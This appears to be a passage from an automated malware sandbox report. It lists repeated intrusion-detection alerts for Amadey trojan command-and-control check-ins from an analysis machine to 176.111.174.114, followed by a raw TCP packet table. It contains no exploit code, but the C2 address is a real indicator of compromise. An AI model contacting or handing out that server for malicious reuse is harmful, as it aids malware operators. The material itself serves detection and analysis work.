                                                                                                                                          04/28/21-22:59:43.036272TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.346451TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.661227TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.978337TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.282030TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.596576TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.905252TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.219613TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.539273TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.848770TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.161587TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.476013TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.795538TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.118421TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.437123TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.752852TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.067327TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.377612TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.693478TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.008996TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.342708TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.676523TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.993476TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:50.317758TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:50.723228TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:51.050752TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:51.847281TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:52.164590TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:53.538793TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:53.854027TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.178078TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.490307TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.800630TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.123074TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.440532TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.766357TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.080051TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.397057TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.727223TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.058214TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.366858TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.686993TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.000788TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.303217TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.614620TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.929699TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.240889TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.553277TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.861910TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.175297TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.487630TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.808924TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.133167TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.443860TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.755473TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.078834TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.406014TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.760524TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.071374TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.382013TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.692403TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.020567TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.329595TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.647457TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.958951TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.272541TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.582420TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.910500TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.225959TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.537076TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.853204TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.159349TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.475828TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.805189TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.115505TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.434033TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.735422TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.226793TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.552374TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.885467TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:10.585930TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:10.969853TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:12.207300TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:12.526020TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:12.836748TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:13.146499TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:13.458814TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:13.771452TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:14.087088TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:14.397739TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:14.712036TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:15.050785TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:15.367642TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:15.675512TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:15.991588TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:16.307411TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:16.634389TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:16.944256TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:17.258733TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:17.577191TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:17.881489TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:18.198049TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:18.509009TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:18.819573TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:19.128921TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:19.447221TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:19.796682TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:20.119419TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:20.430602TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:20.736065TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:21.052602TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:21.367979TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:21.674333TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:21.973415TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:22.288806TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:22.612209TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:22.925429TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:23.219957TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:23.531750TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:23.846836TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:24.147510TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:24.458762TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:24.800692TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:25.131280TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:25.482793TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:25.801202TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:26.105435TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:26.411928TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:26.730499TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:27.042220TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:27.352742TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:27.908011TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:28.212730TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:28.883387TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:29.225320TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:30.512340TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:30.867643TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:31.183269TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:31.497220TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:31.834881TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:32.168560TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:32.494080TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:32.807512TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:33.112050TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:33.413007TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:33.727393TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:34.037985TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:34.357189TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:34.678877TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:34.994765TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:35.305525TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:35.618348TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:35.934020TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:36.255496TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:36.567079TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:36.873468TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:37.192740TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:37.512601TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:37.825913TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:38.135568TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:38.445409TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:38.763545TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:39.089795TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:39.423312TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:39.742126TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:40.055642TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:40.363916TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:40.659601TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:40.986804TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:41.303685TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:41.619910TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:41.937402TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:42.243217TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:42.555712TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:42.875134TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:43.193472TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.4176.111.174.114

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Apr 28, 2021 22:58:32.349229097 CEST49714443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 22:58:32.349282980 CEST49684443192.168.2.440.126.31.6
                                                                                                                                          Apr 28, 2021 22:58:33.091521025 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091665030 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091727018 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091767073 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091804028 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091825962 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091885090 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091917038 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.091967106 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.126959085 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.127187014 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.127542973 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.127861977 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.128185034 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.128623962 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.128914118 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129308939 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129431009 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129457951 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129528999 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.129564047 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129709959 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129761934 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.129817009 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.129873037 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.130242109 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.130268097 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.130558968 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.200278997 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.200424910 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:33.216969013 CEST49712443192.168.2.4204.79.197.222
                                                                                                                                          Apr 28, 2021 22:58:33.252804041 CEST44349712204.79.197.222192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.254681110 CEST44349712204.79.197.222192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.254695892 CEST44349712204.79.197.222192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.254764080 CEST49712443192.168.2.4204.79.197.222
                                                                                                                                          Apr 28, 2021 22:58:33.254787922 CEST49712443192.168.2.4204.79.197.222
                                                                                                                                          Apr 28, 2021 22:58:38.249294996 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250247955 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250384092 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250452042 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250492096 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250516891 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250644922 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250693083 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.250837088 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.284935951 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.285646915 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286082029 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286439896 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286470890 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286758900 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286788940 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286880970 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.286953926 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.286995888 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287071943 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287153959 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287231922 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287287951 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.287394047 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287686110 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287703991 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.287764072 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:38.350209951 CEST44349691204.79.197.200192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.350326061 CEST49691443192.168.2.4204.79.197.200
                                                                                                                                          Apr 28, 2021 22:58:41.531543970 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.575043917 CEST44349733104.17.63.50192.168.2.4
